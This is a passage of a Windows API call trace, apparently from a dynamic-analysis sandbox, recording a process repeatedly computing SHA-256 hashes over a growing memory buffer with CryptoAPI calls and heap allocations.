	[0196.953] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b238, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b238, pdwDataLen=0x128aac) returned 1
	[0196.953] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.953] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.953] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.953] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.953] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0196.953] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.954] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b260
	[0196.954] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b260, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b260, pdwDataLen=0x128aac) returned 1
	[0196.954] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.954] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.954] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.954] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.954] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0196.954] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.954] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b288
	[0196.954] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b288, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b288, pdwDataLen=0x128aac) returned 1
	[0196.954] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.954] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.954] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.954] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.954] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0196.954] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.955] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b2b0
	[0196.955] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b2b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b2b0, pdwDataLen=0x128aac) returned 1
	[0196.955] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.955] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.955] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.955] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.955] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0196.955] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.955] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b2d8
	[0196.955] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b2d8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b2d8, pdwDataLen=0x128aac) returned 1
	[0196.955] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.955] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.955] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.955] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.955] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0196.955] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.955] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b300
	[0196.956] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b300, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b300, pdwDataLen=0x128aac) returned 1
	[0196.956] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.956] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.956] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.956] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.956] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0196.956] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.956] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b328
	[0196.956] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b328, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b328, pdwDataLen=0x128aac) returned 1
	[0196.956] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.956] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.956] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.956] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.956] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0196.956] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.956] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b350
	[0196.956] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b350, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b350, pdwDataLen=0x128aac) returned 1
	[0196.957] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.957] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.957] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.957] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.957] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0196.957] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.957] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b378
	[0196.957] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b378, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b378, pdwDataLen=0x128aac) returned 1
	[0196.957] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.957] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.957] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.957] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.957] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0196.957] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.957] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b3a0
	[0196.957] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b3a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b3a0, pdwDataLen=0x128aac) returned 1
	[0196.957] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.958] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.958] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.958] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.958] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0196.958] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.958] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b3c8
	[0196.958] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b3c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b3c8, pdwDataLen=0x128aac) returned 1
	[0196.958] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.958] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.958] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.958] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.958] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0196.958] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.958] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b3f0
	[0196.958] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b3f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b3f0, pdwDataLen=0x128aac) returned 1
	[0196.958] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.958] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.959] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.959] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.959] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0196.959] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.959] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b418
	[0196.959] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b418, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b418, pdwDataLen=0x128aac) returned 1
	[0196.959] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.959] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.959] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.959] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.959] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0196.959] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.959] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b440
	[0196.959] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b440, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b440, pdwDataLen=0x128aac) returned 1
	[0196.959] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.959] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.959] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.960] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.960] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0196.960] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.960] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b468
	[0196.960] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b468, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b468, pdwDataLen=0x128aac) returned 1
	[0196.960] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.960] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.960] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.960] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.960] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0196.960] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.960] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b490
	[0196.960] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b490, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b490, pdwDataLen=0x128aac) returned 1
	[0196.960] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.960] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.960] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.961] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.961] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0196.961] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.961] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b4b8
	[0196.961] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b4b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b4b8, pdwDataLen=0x128aac) returned 1
	[0196.961] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.961] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.961] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.961] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.961] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0196.961] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.961] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b4e0
	[0196.961] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b4e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b4e0, pdwDataLen=0x128aac) returned 1
	[0196.961] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.961] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.961] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.962] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.962] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0196.962] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.962] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b508
	[0196.962] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b508, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b508, pdwDataLen=0x128aac) returned 1
	[0196.962] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.962] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.962] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.962] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.962] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0196.962] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.962] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b530
	[0196.962] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b530, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b530, pdwDataLen=0x128aac) returned 1
	[0196.962] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.962] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.962] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.963] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.963] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0196.963] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.963] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b558
	[0196.963] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b558, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b558, pdwDataLen=0x128aac) returned 1
	[0196.963] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.963] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.963] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.963] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.963] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0196.963] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.963] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b580
	[0196.963] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b580, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b580, pdwDataLen=0x128aac) returned 1
	[0196.963] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.963] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.963] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.964] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.964] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0196.964] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.964] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b5a8
	[0196.964] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b5a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b5a8, pdwDataLen=0x128aac) returned 1
	[0196.964] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.964] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.964] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.964] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.964] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0196.964] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.964] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b5d0
	[0196.964] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b5d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b5d0, pdwDataLen=0x128aac) returned 1
	[0196.964] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.964] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.964] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.965] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.965] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0196.965] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.965] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b5f8
	[0196.965] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b5f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b5f8, pdwDataLen=0x128aac) returned 1
	[0196.965] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.965] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.965] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.965] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.965] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0196.965] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.965] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b620
	[0196.965] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b620, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b620, pdwDataLen=0x128aac) returned 1
	[0196.965] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.965] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
